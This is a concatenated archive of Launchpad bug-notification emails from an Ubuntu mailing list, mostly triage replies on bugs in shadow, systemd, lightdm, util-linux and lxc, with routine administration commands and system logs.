  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1450880] Re: Impossible to set root password in Ubuntu Touch

[Serge Hallyn]

If this is still an issue, please re-open this bug.

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1450880

Title:
  Impossible to set root password in Ubuntu Touch

Status in shadow package in Ubuntu:
  Invalid

Bug description:
  On the bq Aquaris Ubuntu Edition it is not possible to set a root password. 
Normally you can use
  sudo passwd root
  to set the root password, but this fail with following message:
  passwd: Authentication token manipulation error
  passwd: password unchanged

  On the Ubuntu on my pc I  do not use a root password, as my user password is 
strong enough. But on a smart phone I use a shorter password, as I have to 
enter it way too often. Also I guess this counts for most other users.
  The root access should be still secure, so a separate root password is needed.

  ProblemType: Bug
  DistroRelease: Ubuntu RTM 14.09
  Package: passwd 1:4.1.5.1-1.1ubuntu2
  Uname: Linux 3.4.67 armv7l
  ApportVersion: 2.14.7-0ubuntu8
  Architecture: armhf
  Date: Sat Apr 18 18:30:19 2015
  InstallationDate: Installed on 2015-04-10 (7 days ago)
  InstallationMedia: Ubuntu Utopic Unicorn (development branch) - armhf 
(20150410-232623)
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)
  modified.conffile..etc.cron.daily.passwd: [deleted]

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1450880/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1547907] Re: package login 1:4.1.5.1-1ubuntu9.2 failed to install/upgrade: unable to install new version of `/bin/su': Device or resource busy

[Serge Hallyn]

Thanks for reporting this bug.  Please reply if you have some situation
where this might still occur.

** Changed in: shadow (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1547907

Title:
  package login 1:4.1.5.1-1ubuntu9.2 failed to install/upgrade: unable
  to install new version of `/bin/su': Device or resource busy

Status in shadow package in Ubuntu:
  Invalid

Bug description:
  This happens on every startup

  ProblemType: Package
  DistroRelease: Ubuntu 14.04
  Package: login 1:4.1.5.1-1ubuntu9.2
  ProcVersionSignature: Ubuntu 3.13.0-77.121-generic 3.13.11-ckt32
  Uname: Linux 3.13.0-77-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3.19
  Architecture: amd64
  Date: Thu Feb 18 22:39:20 2016
  DpkgTerminalLog:
   Preparing to unpack .../login_1%3a4.1.5.1-1ubuntu9.2_amd64.deb ...
   Unpacking login (1:4.1.5.1-1ubuntu9.2) over (1:4.1.5.1-1ubuntu9.1) ...
  DuplicateSignature: package:login:1:4.1.5.1-1ubuntu9.2:unable to install new 
version of `/bin/su': Device or resource busy
  ErrorMessage: unable to install new version of `/bin/su': Device or resource 
busy
  InstallationDate: Installed on 2015-01-31 (385 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 
(20140722.2)
  RelatedPackageVersions:
   dpkg 1.17.5ubuntu5.5
   apt  1.0.1ubuntu2.11
  SourcePackage: shadow
  Title: package login 1:4.1.5.1-1ubuntu9.2 failed to install/upgrade: unable 
to install new version of `/bin/su': Device or resource busy
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1547907/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1565345] Re: ubuntuBSD support

[Serge Hallyn]

Hi,

looking at the package today, control already has libaudit-dev [linux-
any] and --with-audit was dropped from rules, so I believe what you want
should already be achieved.  Please re-open if that's not the case.

** Changed in: shadow (Ubuntu)
   Status: New => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1565345

Title:
  ubuntuBSD support

Status in shadow package in Ubuntu:
  Fix Released

Bug description:
  Hi

  Please could you apply attached patch to make shadow buildable on
  ubuntuBSD? It just needs to adjust the libaudit dependency and build
  flags.

  Thanks!

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1565345/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1679765] Re: cannot lock password for user created with useradd --extrausers

[Serge Hallyn]

Extrausers is a concept introduced by the libnss-extrausers package.
shadow and passwd simply know nothing about it.

It simply is not a bug in the shadow package. It's a wholly un-
implemented feature. It's not clear to me how this would function -
after all these are supposed to be accounts 'copied from other systems'
according to the package.  And I'm not clear on how these would relate
to ldap, for instance.

So if you are interested in using passwd or usermod for these, I would
recommend opening a discussion at either (or both) github.com/shadow-
maint/shadow/issues, or probably better at the libnss-extrausers
package.

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1679765

Title:
  cannot lock password for user created with useradd --extrausers

Status in shadow package in Ubuntu:
  Invalid

Bug description:
  passwd -l does not take --extrausers or otherwise work for extrausers.
  Neither does usermod.

  % mkdir -p /var/lib/extrausers
  % for f in passwd group gshadow subuid subgid shadow; do touch 
/var/lib/extrausers/$f; done
  % useradd foo --extrausers --shell /bin/bash -m
  % echo $?
  0
  % # cat /var/lib/extrausers/passwd
  foo:x:1001:1001::/home/foo:/bin/bash

  % passwd -l foo
  passwd: user 'foo' does not exist

  % passwd --extrausers -l foo
  passwd: unrecognized option '--extrausers'

  % usermod --lock foo
  usermod: user 'foo' does not exist

  % usermod --extrausers --lock foo
  usermod: unrecognized option '--extrausers'

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: passwd 1:4.2-3.1ubuntu5
  ProcVersionSignature: Ubuntu 4.9.0-15.16-generic 4.9.5
  Uname: Linux 4.9.0-15-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.5
  Architecture: amd64
  Date: Tue Apr  4 16:34:20 2017
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   LANG=C.UTF-8
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)

  Related bugs:
   * bug 1679777: Adding and reporting ssh keys fails for user in extrausers

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1679765/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1860926] Re: Ubuntu 20.04 Systemd fails to configure bridged network

[Serge CLAUS]

Same problem for me on Raspi 4 (bridged networking)

I have found a quick and dirty workaround:
In crontab:
  @reboot root netplan apply

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1860926

Title:
  Ubuntu 20.04  Systemd fails to configure bridged network

Status in systemd package in Ubuntu:
  Confirmed
Status in systemd source package in Focal:
  Confirmed

Bug description:
  [impact]

  A bridged interface with static ipv4 address and gateway configuration
  will fail to properly add the route via the gateway, leaving the
  system without a globally working network.

  [test case]

  On a Focal system, remove all network configuration and create this
  netplan:

  network:
    version: 2
    renderer: networkd
    ethernets:
  enp4s0:
    dhcp4: false
    bridges:
  br0:
    interfaces: [enp4s0]
    dhcp4: no
    addresses: [192.168.0.4/24]
    gateway4: 192.168.0.1
    nameservers:
  search: [mydomain]
  addresses: [192.168.0.1,192.168.0.2,192.168.0.3]

  Replace the interface name 'enp4s0' with the actual interface name on
  the test system.

  Reboot the system, and check the route to the gateway, which will be
  missing:

  root@lp1860926-f:~# ip r
  192.168.0.0/24 dev br0 proto kernel scope link src 192.168.0.4

  The route is expected to be present, e.g.:

  ubuntu@lp1860926-e:~$ ip r
  default via 192.168.0.1 dev br0 proto static
  192.168.0.0/24 dev br0 proto kernel scope link src 192.168.0.4

  [regression potential]

  Not SRU - N/A

  [scope]

  This is not reproducable on Eoan or Bionic; this is needed only for
  Focal.

  [original description]

  Freshly installed Ubuntu 20.04 fully patched to days date with static
  IP address works fine and survives a reboot

  network:
    version: 2
    renderer: networkd
    ethernets:
  enp4s0:
    dhcp4: false
    addresses: [192.168.0.4/24]
    gateway4: 192.168.0.1
    nameservers:
  search: [mydomain]
  addresses: [192.168.0.1,192.168.0.2,192.168.0.3]

  however when converted to a bridged network for kvm

  network:
    version: 2
    renderer: networkd
    ethernets:
  enp4s0:
    dhcp4: false
    bridges:
  br0:
    interfaces: [enp4s0]
    dhcp4: no
    addresses: [192.168.0.4/24]
    gateway4: 192.168.0.1
    nameservers:
  search: [mydomain]
  addresses: [192.168.0.1,192.168.0.2,192.168.0.3]

  will not survive a reboot and required systemd-network to be restarted or
  @reboot /usr/sbin/netplan apply
  added to the crontab

  after a reboot the network can not b eaccseed and a
  systemctl status systemd-networkd produces

  systemd-networkd.service - Network Service
   Loaded: loaded (/lib/systemd/system/systemd-networkd.service; enabled; 
vendor preset: enabled)
   Active: active (running) since Sun 2020-01-26 16:36:28 UTC; 2min 27s ago
  TriggeredBy: ● systemd-networkd.socket
     Docs: man:systemd-networkd.service(8)
     Main PID: 979 (systemd-network)
   Status: "Processing requests..."
    Tasks: 1 (limit: 57662)
   Memory: 4.1M
   CGroup: /system.slice/systemd-networkd.service
   └─979 /lib/systemd/systemd-networkd

  Jan 26 16:38:02 firebolt systemd-networkd[979]: rtnl: received neighbor for 
link '5' we don't know about, ignoring.
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: rtnl: received 
neighbor message with invalid family, ignoring.
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: rtnl: received 
neighbor message with invalid family, ignoring.
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0: rtnl: received 
neighbor message with invalid family, ignoring.
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Link UP
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Gained carrier
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0: Link UP
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Link DOWN
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Lost carrier
  Jan 26 16:38:02 firebolt systemd-networkd[979]: virbr0-nic: Kernel removed an 
address we don't remember: fe80::5054:ff:fed9:7e26/64 (valid forever), ignoring.

  systemctl restart systemd-networkd resolved the issue and a

  systemctl status systemd-network producessystemd-networkd.service - Network 
Service
   Loaded: loaded (/lib/systemd/system/systemd-networkd.service; enabled; 
vendor preset: enabled)
   Active: active (running) since Sun 2020-01-26 16:39:28 UTC; 41s ago
  TriggeredBy: ● systemd-networkd.socket
     Docs: man:systemd-networkd.service(8)
     Main PID: 1650 (systemd-network)
   Status: "Processing requests..."
    Tasks: 1 (limit: 57662)
   Memory: 1.6M
   CGroup: /system.slice/systemd-networkd.service
   └─1650 

[Touch-packages] [Bug 1817496] Re: Login always shows partitions to be fsck-ed, even after reboot.

[Serge Hallyn]

You should be able to manually do

fsck /dev/sda5

If the filesystem on sda5 is listed in /etc/fstab, then sixth fstab
field for that filesystem should be '2'.  If it is 0, then indeed it
won't be fsck'd on reboot.

fstab is owned by util-linux, but system bringup belongs to systemd, so
I'm assigning this to the systemd package.  However I suspect fstab
lists '0' for the sixth field, and the system is doing what it is told.

** Package changed: shadow (Ubuntu) => systemd (Ubuntu)

** Changed in: systemd (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1817496

Title:
  Login always shows partitions to be fsck-ed, even after reboot.

Status in systemd package in Ubuntu:
  Incomplete

Bug description:
  This system reports /dev/sda5 will be checked on the next reboot.
  Maybe it is (it's EXT4 on as SSD drive, so it could be too fast to
  notice), but the message persists even after such a reboot.

  I would expect it to go away.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: login 1:4.5-1ubuntu1
  ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18
  Uname: Linux 4.15.0-45-generic x86_64
  NonfreeKernelModules: wl
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  Date: Sun Feb 24 17:27:50 2019
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1817496/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1817496] Re: Login always shows partitions to be fsck-ed, even after reboot.

[Serge Hallyn]

Please show the results of 'mount | grep sda5' and the contents of
/etc/fstab.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1817496

Title:
  Login always shows partitions to be fsck-ed, even after reboot.

Status in systemd package in Ubuntu:
  Incomplete

Bug description:
  This system reports /dev/sda5 will be checked on the next reboot.
  Maybe it is (it's EXT4 on as SSD drive, so it could be too fast to
  notice), but the message persists even after such a reboot.

  I would expect it to go away.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: login 1:4.5-1ubuntu1
  ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18
  Uname: Linux 4.15.0-45-generic x86_64
  NonfreeKernelModules: wl
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  Date: Sun Feb 24 17:27:50 2019
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1817496/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1808864] Re: Poor translation of zh_CN gpasswd(1) man page

[Serge Hallyn]

Would you mind comparing this to the new version at

https://github.com/shadow-maint/shadow/blob/master/po/zh_CN.po

?  I looked for the 'administrator' one, and that seems fixed.  Any
other updates you have which you could post as pull requests against the
upstream project would be greatly appreciated.

** Changed in: shadow (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to language-pack-zh-hans in
Ubuntu.
https://bugs.launchpad.net/bugs/1808864

Title:
  Poor translation of zh_CN gpasswd(1) man page

Status in Ubuntu Translations:
  New
Status in language-pack-zh-hans package in Ubuntu:
  New
Status in shadow package in Ubuntu:
  Incomplete

Bug description:
  man -l /usr/share/man/zh_CN/man1/gpasswd.1.gz

  The zh_CN version of gpasswd(1) not only is partially done, but also
  contains an error in the first sentence. The translator confused the
  verb "administer" with the person "administrator." The section
  heading, originally "Notes (noun) about group passwords," was
  translated as "Please note (verb) the group passwords." Even Google
  translate does better!

  Translation errors
  ==
  gpasswd - administer /etc/group and /etc/gshadow
  gpasswd - 管理员 /etc/group 和 /etc/gshadow
^^ 管理员 -- administrator
   管理 -- administer

  Notes about group passwords
  请注意组密码
  ^^ 请注意…… -- please note (v.)
 关于……的说明 -- notes (n.) about

  Typos
  =
  -h, --help
  Display help message and exit.

  -h, --help
  现实帮助信息并退出。
   显示 Xiǎnshì -- display
   现实 Xiànshí -- reality

  Correct Google translate results (this but unironically)
  
  "gpasswd - administer /etc/group and /etc/gshadow"
  "gpasswd - 管理 /etc/group 和 /etc/gshadow"

  "Notes about group passwords"
  "关于组密码的说明"

  "Display help message and exit."
  "显示帮助消息并退出。"

  Notes about my system
  =
  $ lsb_release -rd
  Description:Ubuntu 18.04.1 LTS
  Release:18.04
  $ apt-cache policy passwd
  passwd:
Installed: 1:4.5-1ubuntu1
Candidate: 1:4.5-1ubuntu1
Version table:
   *** 1:4.5-1ubuntu1 500
  500 http://us.archive.ubuntu.com/ubuntu bionic/main amd64 Packages
  100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-translations/+bug/1808864/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1811893] Re: In Ubuntu on Virtualbox, the screen is blank after sign-in

[Serge Hallyn]

Thanks for reporting this bug.  This looks to be a bug with either
xubuntu login manager or xubuntu default X11 session, so I'm reassigning
it to lightdm.

** Package changed: shadow (Ubuntu) => lightdm (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1811893

Title:
  In Ubuntu on Virtualbox, the screen is blank after sign-in

Status in lightdm package in Ubuntu:
  New

Bug description:
  I installed xubuntu in my Windows box using the latest VBOX (6.0). It
  installed perfectly however after I log in the screen kind of freezes.
  I see the background however the icons and title bar do not appear.
  Also mouse inputs like right click do not work. Function keys do not
  work either like alt F2.

  Xubuntu system is updated and the guest addons are installed.

  I have tried disbling the 3d acceleration however that did not work.

  The only way I can get this to load the icons is to go to Devices ->
  Insert Guest Additions CD Image. Once I click on Insert Guest
  Additions the icons and title bar load and everything works fine.

  I checked online for solutions but have not found any that work.

  This also seems to be a problem with other versions of Ubuntu and
  other Linux distributions.

  xubuntu 10.04.1

  Description:  Ubuntu 18.04.1 LTS
  Release:  18.04

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: login 1:4.5-1ubuntu1
  ProcVersionSignature: Ubuntu 4.15.0-43.46-generic 4.15.18
  Uname: Linux 4.15.0-43-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Tue Jan 15 15:20:31 2019
  InstallationDate: Installed on 2019-01-15 (0 days ago)
  InstallationMedia: Xubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 
(20180725)
  ProcEnviron:
   LANGUAGE=en_US
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1811893/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1872443] Re: /etc/securetty missing: dovecot not working

[Serge Hallyn]

This was a decision made by the debian package (see
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=771675 ).

Would you mind raising a bug against pam and shadow in debian bringing
this up? Perhaps the libpam-modules package should supply it alongside
the pam_securetty.so.

Please let us know if you're not comfortable doing that.


** Bug watch added: Debian Bug tracker #771675
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=771675

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1872443

Title:
  /etc/securetty missing: dovecot not working

Status in shadow package in Ubuntu:
  New

Bug description:
  With Ubuntu 20.04 Focal Fossa, /etc/securetty is missing from the
  "login" package (4.8.1-1ubuntu4).

  This leads to errors such as in /var/log/mail.log when a dovecot auth
  is tried:

  Apr 13 13:08:17 venus dovecot[10588]: imap-login: Login: user=, 
method=PLAIN,
  rip=192.168.123.1, lip=192.168.123.188, mpid=12200, TLS, TLSv1.2 with cipher 
ECDHE-E
  CDSA-AES256-GCM-SHA384 (256/256 bits)
  Apr 13 13:08:18 venus auth[12195]: pam_unix(dovecot:auth): Couldn't open 
/etc/secure
  tty: No such file or directory
  Apr 13 13:08:18 venus auth[12195]: pam_unix(dovecot:auth): Couldn't open 
/etc/secure
  tty: No such file or directory
  Apr 13 13:08:18 venus dovecot[10588]: imap-login: Login: user=, 
method=PLAIN,
  rip=192.168.123.1, lip=192.168.123.188, mpid=12202, TLS, TLSv1.2 with cipher 
ECDHE-E
  CDSA-AES256-GCM-SHA384 (256/256 bits)

  It seems that pam_unix still needs /etc/securetty, but login no longer
  provides it.

  There was a similar bug in debian that seems to be related:

  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931899

  To my understanding, this is a problem between pam and login packages
  in 20.04.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1872443/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 998816] Re: Login password is shown in plaintext

[Serge Hallyn]

Note this was wishlist in shadow, but i can't find wishlist in the list
of options any more.

** Changed in: util-linux (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to util-linux in Ubuntu.
https://bugs.launchpad.net/bugs/998816

Title:
  Login password is shown in plaintext

Status in util-linux package in Ubuntu:
  Confirmed

Bug description:
  This bug was originally posted on kernel.org but it was closed because
  it seems to be a non-related kernel bug:
  https://bugzilla.kernel.org/show_bug.cgi?id=21272

  I'm currently using Ubuntu 12.10 dev and the bug still exists there.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/util-linux/+bug/998816/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 998816] Re: Login password is shown in plaintext

[Serge Hallyn]

This is actually a bug in getty, which accepts the username and then
starts login.

** Package changed: shadow (Ubuntu) => util-linux (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to util-linux in Ubuntu.
https://bugs.launchpad.net/bugs/998816

Title:
  Login password is shown in plaintext

Status in util-linux package in Ubuntu:
  Confirmed

Bug description:
  This bug was originally posted on kernel.org but it was closed because
  it seems to be a non-related kernel bug:
  https://bugzilla.kernel.org/show_bug.cgi?id=21272

  I'm currently using Ubuntu 12.10 dev and the bug still exists there.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/util-linux/+bug/998816/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 600653] Re: passwd man mistake minage -m should be -n

[Serge Hallyn]

** Changed in: shadow (Ubuntu)
   Status: New => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/600653

Title:
  passwd man mistake minage -m should  be -n

Status in shadow package in Ubuntu:
  Fix Released

Bug description:
  root@XX:/etc/pam.d# cat /etc/issue
  Ubuntu 8.10 \n \l

  root@X:/etc/pam.d# man passwd | grep min
 -m, --mindays MIN_DAYS
 Set the minimum number of days between password changes to
 of the last password change. The next four fields are the minimum
  root@onmsip02:/etc/pam.d# passwd -m 1 root
  passwd: invalid option -- 'm'
  Usage: passwd [options] [LOGIN]

  Options:
-a, --all report password status on all accounts
-d, --delete  delete the password for the named account
-e, --expire  force expire the password for the named 
account
-h, --helpdisplay this help message and exit
-k, --keep-tokens change password only if expired
-i, --inactive INACTIVE   set password inactive after expiration
  to INACTIVE
-l, --locklock the named account
-n, --mindays MIN_DAYSset minimum number of days before password
  change to MIN_DAYS
-q, --quiet   quiet mode
-r, --repository REPOSITORY   change password in REPOSITORY repository
-S, --status  report password status on the named account
-u, --unlock  unlock the named account
-w, --warndays WARN_DAYS  set expiration warning days to WARN_DAYS
-x, --maxdays MAX_DAYSset maximim number of days before password
  change to MAX_DAYS

  
  root@X:/etc/pam.d# passwd -n 1 root && echo $?
  Password changed.
  0
  root@:/etc/pam.d#

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/600653/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1759247] Re: lxc-copy forgets to change /etc/hostname and /etc/hosts

[Serge Hallyn]

Tested this in eoan - hostname had the new name.

** Changed in: lxc (Ubuntu)
   Status: New => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1759247

Title:
  lxc-copy forgets to change /etc/hostname and /etc/hosts

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  LXC 2.x behaved like this when cloning containers: it wrote the new
  hostname into /etc/hostname of the new container, and changed
  /etc/hosts accordingly. LXC 3.0.0.beta3 no longer does it.

  root@zh1cn:/var/lib/lxc# lxc-create -t download -n ubuntu-1604-new -- -d 
ubuntu -a amd64 -r xenial
  Setting up the GPG keyring
  Downloading the image index
  Downloading the rootfs
  Downloading the metadata
  The image cache is now ready
  Unpacking the rootfs

  ---
  You just created an Ubuntu container (release=xenial, arch=amd64, 
variant=default)

  To enable sshd, run: apt-get install openssh-server

  For security reason, container images ship without user accounts
  and without a root password.

  Use lxc-attach or chroot directly into the rootfs to set a root password
  or create user accounts.


  root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new/config 
  # Template used to create this container: 
/usr/share/lxc/templates/lxc-download
  # Parameters passed to the template: -d ubuntu -a amd64 -r xenial
  # Template script checksum (SHA-1): 5f6cea9c51537459a7ab5f81e2c1eac6a94b5e08
  # For additional config options, please look at lxc.container.conf(5)

  # Uncomment the following line to support nesting containers:
  #lxc.include = /usr/share/lxc/config/nesting.conf
  # (Be aware this has security implications)

  
  # Distribution configuration
  lxc.include = /usr/share/lxc/config/common.conf
  lxc.arch = x86_64

  # Container specific configuration
  lxc.rootfs.path = dir:/var/lib/lxc/ubuntu-1604-new/rootfs
  lxc.uts.name = ubuntu-1604-new

  # Network configuration
  lxc.net.0.type = veth
  lxc.net.0.link = lxcbr0
  lxc.net.0.flags = up
  lxc.net.0.hwaddr = 00:16:3e:65:85:6b


  root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new/rootfs/etc/hostname 
  ubuntu-1604-new


  root@zh1cn:/var/lib/lxc# lxc-copy -n ubuntu-1604-new -N
  ubuntu-1604-new1


  root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new1/config
  # Template used to create this container: 
/usr/share/lxc/templates/lxc-download
  # Parameters passed to the template: -d ubuntu -a amd64 -r xenial
  # Template script checksum (SHA-1): 5f6cea9c51537459a7ab5f81e2c1eac6a94b5e08
  # For additional config options, please look at lxc.container.conf(5)
  # Uncomment the following line to support nesting containers:
  #lxc.include = /usr/share/lxc/config/nesting.conf
  # (Be aware this has security implications)
  # Distribution configuration
  lxc.include = /usr/share/lxc/config/common.conf
  lxc.arch = x86_64
  # Container specific configuration
  # Network configuration
  lxc.net.0.type = veth
  lxc.net.0.link = lxcbr0
  lxc.net.0.flags = up
  lxc.net.0.hwaddr = 00:16:3e:ec:9a:54
  lxc.rootfs.path = dir:/var/lib/lxc/ubuntu-1604-new1/rootfs
  lxc.uts.name = ubuntu-1604-new1


  root@zh1cn:/var/lib/lxc# cat ubuntu-1604-new1/rootfs/etc/hostname 
  ubuntu-1604-new

  I would expect ubuntu-1604-new1 here, or maybe no such file at all (so
  that lxc.uts.name applies from the config).

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: lxc 3.0.0~beta3-0ubuntu1
  ProcVersionSignature: Ubuntu 4.15.0-12.13-generic 4.15.7
  Uname: Linux 4.15.0-12-generic x86_64
  ApportVersion: 2.20.9-0ubuntu1
  Architecture: amd64
  Date: Tue Mar 27 19:21:21 2018
  InstallationDate: Installed on 2018-01-25 (61 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Alpha amd64 (20180120)
  PackageArchitecture: all
  ProcEnviron:
   LANG=en_US.UTF-8
   TERM=xterm
   SHELL=/bin/bash
   PATH=(custom, no user)
  SourcePackage: lxc
  UpgradeStatus: No upgrade log present (probably fresh install)
  defaults.conf:
   lxc.net.0.type = veth
   lxc.net.0.link = lxcbr0
   lxc.net.0.flags = up
   lxc.net.0.hwaddr = 00:16:3e:xx:xx:xx

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1759247/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

